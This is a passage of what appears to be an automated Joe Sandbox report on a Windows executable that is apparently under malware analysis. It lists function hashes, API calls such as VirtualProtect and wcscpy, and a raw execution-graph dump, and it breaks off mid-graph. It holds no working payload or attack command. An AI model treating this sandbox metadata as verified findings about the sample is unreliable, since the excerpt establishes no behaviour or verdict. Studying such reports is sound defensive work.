                                                        • Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: AllocatePagesPhysicalUser
                                                        • String ID:
                                                        • API String ID: 889254806-0
                                                        • Opcode ID: 0328bc8ef6a53200854c36a9a6d061530187d3d5cbec243a2c25dcd54762ec6b
                                                        • Instruction ID: 836d7c8f89eac4d1f0aa2bb7fe9f4e8f8045725027e5cddf8129e0de0e753893
                                                        • Opcode Fuzzy Hash: 0328bc8ef6a53200854c36a9a6d061530187d3d5cbec243a2c25dcd54762ec6b
                                                        • Instruction Fuzzy Hash: 26F0C971A08F46C2DA34EB51F89492EB762FB483A0F404439E99D43725DF3CF0548B60

                                                        Non-executed Functions

                                                        Function 00007FF71EB13B50 Relevance: 121.2, APIs: 67, Strings: 1, Instructions: 2206COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        • Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
                                                        • String ID:
                                                        • API String ID: 3604702941-3916222277
                                                        • Opcode ID: db90249458c669816813ce45624f7ae6fb86a0956b0c7d6c9660714c4cc28e67
                                                        • Instruction ID: 6cc750e7efb1bfc2e347e41d5e2886f61212c457f0b520ab35af7d92efdaf37d
                                                        • Opcode Fuzzy Hash: db90249458c669816813ce45624f7ae6fb86a0956b0c7d6c9660714c4cc28e67
                                                        • Instruction Fuzzy Hash: 76534921C2CEC684F732AB29AC016F8E761AF953B4F885235D98C575A5EF6D724CC324
                                                        Function 00007FF71EB13350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        • Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: memset$wcscatwcscpywcslen
                                                        • String ID: $0$0$@$@
                                                        • API String ID: 4263182637-1413854666
                                                        • Opcode ID: 6af65850cbe7cf858f5459e650824eeb499f5a742452982e0f30e052dc73b0d0
                                                        • Instruction ID: 0159b94231e7f2813d8854f9fffdb5cba708231d0afbb7602b132c8227a6c4c6
                                                        • Opcode Fuzzy Hash: 6af65850cbe7cf858f5459e650824eeb499f5a742452982e0f30e052dc73b0d0
                                                        • Instruction Fuzzy Hash: E7B17C2191CAC685F331AB25F8457EAF7A1FB80364F801235EAC8576A5EF7CE149CB10
                                                        Function 00007FF71EB12690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        • Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                        • String ID: 0$X$`
                                                        • API String ID: 329590056-2527496196
                                                        • Opcode ID: 3e74067d2b8f6d9820809deb9a400a2305a428e80b628bc07cd27e0f0585ba98
                                                        • Instruction ID: b897223f400764eebc7d42bc0a60f2975838e0b293a1d8bfc3e8b5f85ff0c07d
                                                        • Opcode Fuzzy Hash: 3e74067d2b8f6d9820809deb9a400a2305a428e80b628bc07cd27e0f0585ba98
                                                        • Instruction Fuzzy Hash: BD026922A08F8581E731AB19F8447AAB7A1FB857B4F814235DADC477A5DF3CE149C720
                                                        Function 00007FF71EB11BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,00007FF71EB1A4C4,00007FF71EB1A4C4,?,?,00007FF71EB10000,?,00007FF71EB11991), ref: 00007FF71EB11C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,00007FF71EB1A4C4,00007FF71EB1A4C4,?,?,00007FF71EB10000,?,00007FF71EB11991), ref: 00007FF71EB11CC7
                                                        • memcpy.MSVCRT ref: 00007FF71EB11CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,00007FF71EB1A4C4,00007FF71EB1A4C4,?,?,00007FF71EB10000,?,00007FF71EB11991), ref: 00007FF71EB11D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        • Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 7e47fe0a3cc757937b184265145bdf76f8034c5237edb91b9583e5a857b50cbf
                                                        • Instruction ID: 78eabde92d4e7f50668bb55ee6653f5a3672314d3f78810a7088abf2fa7e672a
                                                        • Opcode Fuzzy Hash: 7e47fe0a3cc757937b184265145bdf76f8034c5237edb91b9583e5a857b50cbf
                                                        • Instruction Fuzzy Hash: F5418061A08E5681EA31AB05F844ABDA7E2EB84BB0FD54132CE4D87791DE3CF54DC360
                                                        Function 00007FF71EB12104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        • Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: a73ea2713171e8a047f8eee55ea44c161dcaa9f159f1f4536ae8616b18553079
                                                        • Instruction ID: fc57a28b71966df3fcc3df0440cadc222d70d03fdd3ffe41cc97785a55ad23d3
                                                        • Opcode Fuzzy Hash: a73ea2713171e8a047f8eee55ea44c161dcaa9f159f1f4536ae8616b18553079
                                                        • Instruction Fuzzy Hash: 4921DB60E19E5681FA3ABB01F94077CA2A2BF10BB0FC54031C95D4B6A4DF2CB94ED361
                                                        Function 00007FF71EB11E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 640 7ff71eb11e10-7ff71eb11e2d 641 7ff71eb11e3e-7ff71eb11e48 640->641 642 7ff71eb11e2f-7ff71eb11e38 640->642 644 7ff71eb11e4a-7ff71eb11e53 641->644 645 7ff71eb11ea3-7ff71eb11ea8 641->645 642->641 643 7ff71eb11f60-7ff71eb11f69 642->643 647 7ff71eb11ecc-7ff71eb11ed1 644->647 648 7ff71eb11e55-7ff71eb11e60 644->648 645->643 646 7ff71eb11eae-7ff71eb11eb3 645->646 649 7ff71eb11efb-7ff71eb11f0a call 7ff71eb18870 646->649 650 7ff71eb11eb5-7ff71eb11eba 646->650 651 7ff71eb11f23-7ff71eb11f2d 647->651 652 7ff71eb11ed3-7ff71eb11ee2 signal 647->652 648->645 649->651 662 7ff71eb11f0c-7ff71eb11f10 649->662 650->643 653 7ff71eb11ec0 650->653 656 7ff71eb11f2f-7ff71eb11f3f 651->656 657 7ff71eb11f43-7ff71eb11f45 651->657 652->651 654 7ff71eb11ee4-7ff71eb11ee8 652->654 653->651 658 7ff71eb11eea-7ff71eb11ef9 signal 654->658 659 7ff71eb11f4e-7ff71eb11f53 654->659 656->657 657->643 658->643 661 7ff71eb11f5a 659->661 661->643 663 7ff71eb11f12-7ff71eb11f21 signal 662->663 664 7ff71eb11f55 662->664 663->643 664->661
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        • Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 1c404e41e50540ab740d17b3dba579019ccfa589ac9c58556def001b72d5d7d4
                                                        • Instruction ID: ad875ca3f5e0277d036c8f0830c4095a71875492733672a3fd570b8681085c07
                                                        • Opcode Fuzzy Hash: 1c404e41e50540ab740d17b3dba579019ccfa589ac9c58556def001b72d5d7d4
                                                        • Instruction Fuzzy Hash: 6821AE22F0D95641FA757354B580B7DA2D3AF84774FA48131D98D433D4CE2CF88A8261
                                                        Function 00007FF71EB11880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 665 7ff71eb11880-7ff71eb1189c 666 7ff71eb11a0f-7ff71eb11a1f 665->666 667 7ff71eb118a2-7ff71eb118f9 call 7ff71eb12420 call 7ff71eb12660 665->667 667->666 672 7ff71eb118ff-7ff71eb11910 667->672 673 7ff71eb1193e-7ff71eb11941 672->673 674 7ff71eb11912-7ff71eb1191c 672->674 675 7ff71eb1194d-7ff71eb11954 673->675 676 7ff71eb11943-7ff71eb11947 673->676 674->675 677 7ff71eb1191e-7ff71eb11929 674->677 679 7ff71eb1199e-7ff71eb119a6 675->679 680 7ff71eb11956-7ff71eb11961 675->680 676->675 678 7ff71eb11a20-7ff71eb11a26 676->678 677->675 681 7ff71eb1192b-7ff71eb1193a 677->681 684 7ff71eb11b87-7ff71eb11b98 call 7ff71eb11d40 678->684 685 7ff71eb11a2c-7ff71eb11a37 678->685 679->666 683 7ff71eb119a8-7ff71eb119c1 679->683 682 7ff71eb11970-7ff71eb1199c call 7ff71eb11ba0 680->682 681->673 682->679 687 7ff71eb119df-7ff71eb119e7 683->687 685->679 689 7ff71eb11a3d-7ff71eb11a5f 685->689 691 7ff71eb119e9-7ff71eb11a0d VirtualProtect 687->691 692 7ff71eb119d0-7ff71eb119dd 687->692 694 7ff71eb11a7d-7ff71eb11a97 689->694 691->692 697 7ff71eb11a70-7ff71eb11a77 691->697 692->666 692->687 695 7ff71eb11a9d-7ff71eb11afa 694->695 696 7ff71eb11b74-7ff71eb11b82 call 7ff71eb11d40 694->696 702 7ff71eb11afc-7ff71eb11b0e 695->702 703 7ff71eb11b22-7ff71eb11b26 695->703 696->684 697->679 697->694 705 7ff71eb11b5c-7ff71eb11b6f call 7ff71eb11d40 702->705 706 7ff71eb11b10-7ff71eb11b20 702->706 703->697 704 7ff71eb11b2c-7ff71eb11b30 703->704 704->697 707 7ff71eb11b36-7ff71eb11b57 call 7ff71eb11ba0 704->707 705->696 706->703 706->705 707->705
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71EB11247), ref: 00007FF71EB119F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        • Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 717b2846262b070cbf16f4917165f5bf06984c4257135dd60be662c50123eab4
                                                        • Instruction ID: d31147593fc0d565bf1df132fee35307236bc73f3cb075384e8a5e26517eba5a
                                                        • Opcode Fuzzy Hash: 717b2846262b070cbf16f4917165f5bf06984c4257135dd60be662c50123eab4
                                                        • Instruction Fuzzy Hash: D6512135E14946D6EB30AB25F940BBCA7A2EB14BB4F884131D96D07794CE3CF58AC721
                                                        Function 00007FF71EB11800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 712 7ff71eb11800-7ff71eb11810 713 7ff71eb11812-7ff71eb11822 712->713 714 7ff71eb11824 712->714 715 7ff71eb1182b-7ff71eb11867 call 7ff71eb12290 fprintf 713->715 714->715
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        • Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: c3614a3824a7654001b9d39070aa49656cc15abf7340c2d830cf33f92ca81765
                                                        • Instruction ID: 78fe8934c6acc572d9d9cb5c95da91c324fc4f8940e3003ab0c9fd0b849efd29
                                                        • Opcode Fuzzy Hash: c3614a3824a7654001b9d39070aa49656cc15abf7340c2d830cf33f92ca81765
                                                        • Instruction Fuzzy Hash: 88F0AF11E08E8582E631BB24B9414BDE362EB497B0F809231DE4E56251DF2CF186C310
                                                        Function 00007FF71EB1219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        • Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 4410bea657734efe7792d9b5e6ff5cd294ece7a39ccde5653083eadeaedea16a
                                                        • Instruction ID: 33b75dc1610b8b57c4939b3663c5d9c275a8f91ea2919a5ba62baac9e9cfa2e4
                                                        • Opcode Fuzzy Hash: 4410bea657734efe7792d9b5e6ff5cd294ece7a39ccde5653083eadeaedea16a
                                                        • Instruction Fuzzy Hash: CD01DA65A09E0681E636BB11FE0467CA2A2BF04FB0FC54031CA1D57694DF2CB99ED360

                                                        Execution Graph

                                                        Execution Coverage:3.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1782
                                                        Total number of Limit Nodes:2
                                                        execution_graph 4702 7ff70116219e 4703 7ff7011621ab EnterCriticalSection 4702->4703 4704 7ff701162272 4702->4704 4705 7ff701162265 LeaveCriticalSection 4703->4705 4707 7ff7011621c8 4703->4707 4705->4704 4706 7ff7011621e9 TlsGetValue GetLastError 4706->4707 4707->4705 4707->4706 4718 7ff701162104 4719 7ff701162111 EnterCriticalSection 4718->4719 4722 7ff701162218 4718->4722 4721 7ff70116220b LeaveCriticalSection 4719->4721 4726 7ff70116212e 4719->4726 4720 7ff701162272 4721->4722 4722->4720 4723 7ff701162241 DeleteCriticalSection 4722->4723 4725 7ff701162230 free 4722->4725 4723->4720 4724 7ff70116214d TlsGetValue GetLastError 4724->4726 4725->4723 4725->4725 4726->4721 4726->4724 4755 7ff701161e65 4756 7ff701161e67 signal 4755->4756 4757 7ff701161e7c 4756->4757 4759 7ff701161e99 4756->4759 4758 7ff701161e82 signal 4757->4758 4757->4759 4758->4759 2905 7ff701161140 2908 7ff701161160 2905->2908 2907 7ff701161156 2909 7ff70116118b 2908->2909 2910 7ff7011611b9 2908->2910 2909->2910 2911 7ff701161190 2909->2911 2912 7ff7011611c7 _amsg_exit 2910->2912 2913 7ff7011611d3 2910->2913 2911->2910 2914 7ff7011611a0 Sleep 2911->2914 2912->2913 2915 7ff70116121a 2913->2915 2916 7ff701161201 _initterm 2913->2916 2914->2910 2914->2911 2933 7ff701161880 2915->2933 2916->2915 2918 7ff701161247 SetUnhandledExceptionFilter 2919 7ff70116126a 2918->2919 2920 7ff70116126f malloc 2919->2920 2921 7ff70116128b 2920->2921 2924 7ff7011612d2 2920->2924 2922 7ff7011612a0 strlen malloc memcpy 2921->2922 2922->2922 2923 7ff7011612d0 2922->2923 2923->2924 2940 7ff701163b50 2924->2940 2926 7ff701161315 2927 7ff701161324 2926->2927 2930 7ff701161344 2926->2930 2928 7ff70116132d _cexit 2927->2928 2929 7ff701161338 2927->2929 2928->2929 2929->2907 2931 7ff701161160 93 API calls 2930->2931 2932 7ff701161366 2931->2932 2932->2907 2934 7ff7011618a2 2933->2934 2938 7ff701161a0f 2933->2938 2935 7ff701161956 2934->2935 2936 7ff70116199e 2934->2936 2934->2938 2935->2936 3115 7ff701161ba0 2935->3115 2936->2938 2939 7ff7011619e9 VirtualProtect 2936->2939 2938->2918 2939->2936 2942 7ff701163b66 2940->2942 2941 7ff701163c60 wcslen 3125 7ff70116153f 2941->3125 2942->2941 2947 7ff701163d60 2950 7ff701163d7a memset wcscat memset 2947->2950 2952 7ff701163dd3 2950->2952 2953 7ff701163e23 wcslen 2952->2953 2954 7ff701163e35 2953->2954 2958 7ff701163e7c 2953->2958 2955 7ff701163e50 _wcsnicmp 2954->2955 2956 7ff701163e66 wcslen 2955->2956 2955->2958 2956->2955 2956->2958 2957 7ff701163edd wcscpy wcscat memset 2960 7ff701163f1c 2957->2960 2958->2957 2959 7ff701164024 wcscpy wcscat 2961 7ff70116404f memset 2959->2961 2964 7ff701164131 2959->2964 2960->2959 2963 7ff701164070 2961->2963 2962 7ff7011640d5 wcslen 2966 7ff7011640eb 2962->2966 2970 7ff70116412c 2962->2970 2963->2962 3337 7ff701162df0 2964->3337 2967 7ff701164100 _wcsnicmp 2966->2967 2968 7ff701164116 wcslen 2967->2968 2967->2970 2968->2967 2968->2970 2969 7ff7011643a3 wcscpy wcscat memset 2971 7ff7011643e5 2969->2971 2970->2969 2972 7ff70116442a wcscpy wcscat memset 2971->2972 2973 7ff701164470 2972->2973 2974 7ff7011644d5 wcscpy wcscat memset 2973->2974 2975 7ff70116451b 2974->2975 2976 7ff70116454b wcscpy wcscat 2975->2976 2977 7ff701166641 memcpy 2976->2977 2978 7ff70116457d 2976->2978 2977->2978 2979 7ff701162df0 11 API calls 2978->2979 2981 7ff70116472c 2979->2981 2980 7ff701162df0 11 API calls 2982 7ff701164840 memset 2980->2982 2981->2980 2983 7ff701164861 2982->2983 2984 7ff7011648a4 wcscpy wcscat memset 2983->2984 2985 7ff7011648ed 2984->2985 2986 7ff701164930 wcscpy wcscat wcslen 2985->2986 3349 7ff70116146d 2986->3349 2989 7ff701164a44 2992 7ff701164b3a wcslen 2989->2992 2999 7ff701164d2d 2989->2999 3541 7ff70116157b 2992->3541 2993 7ff70116145e 2 API calls 2993->2989 2997 7ff701164d0c memset 2997->2999 2998 7ff701164d9d wcscpy wcscat 3003 7ff701164dcf 2998->3003 2999->2998 3000 7ff701164c9f wcslen 3591 7ff7011615e4 3000->3591 3005 7ff701162df0 11 API calls 3003->3005 3004 7ff70116145e 2 API calls 3004->2997 3007 7ff701164ed7 3005->3007 3006 7ff701164bf9 3006->2997 3006->3000 3008 7ff701162df0 11 API calls 3007->3008 3010 7ff701164fec 3008->3010 3009 7ff701162df0 11 API calls 3011 7ff7011650d6 3009->3011 3010->3009 3012 7ff701162df0 11 API calls 3011->3012 3014 7ff7011651c3 3012->3014 3013 7ff701165304 wcslen 3015 7ff70116157b 2 API calls 3013->3015 3014->3013 3016 7ff70116538e 3015->3016 3017 7ff701165396 memset 3016->3017 3022 7ff7011654a8 3016->3022 3019 7ff7011653b7 3017->3019 3018 7ff701165407 wcslen 3594 7ff7011615a8 3018->3594 3019->3018 3021 7ff701162df0 11 API calls 3028 7ff701165553 3021->3028 3022->3021 3030 7ff701165645 _wcsicmp 3022->3030 3024 7ff70116549c 3026 7ff70116145e 2 API calls 3024->3026 3025 7ff701165477 _wcsnicmp 3025->3024 3033 7ff701165c91 3025->3033 3026->3022 3027 7ff701162df0 11 API calls 3027->3030 3028->3027 3029 7ff701165cee wcslen 3032 7ff7011615a8 2 API calls 3029->3032 3031 7ff701165660 memset 3030->3031 3045 7ff7011659e3 3030->3045 3035 7ff701165684 3031->3035 3034 7ff701165d4a 3032->3034 3033->3029 3037 7ff70116145e 2 API calls 3034->3037 3036 7ff7011656c9 wcscpy wcscat wcslen 3035->3036 3039 7ff70116146d 2 API calls 3036->3039 3037->3022 3038 7ff701165ab0 wcslen 3040 7ff70116153f 2 API calls 3038->3040 3041 7ff701165796 3039->3041 3042 7ff701165b3b 3040->3042 3611 7ff701161530 3041->3611 3044 7ff70116145e 2 API calls 3042->3044 3047 7ff701165b4c 3044->3047 3045->3038 3057 7ff701165bd8 3047->3057 3897 7ff701162f70 3047->3897 3048 7ff701166e0d 3050 7ff70116145e 2 API calls 3048->3050 3049 7ff7011657d4 3656 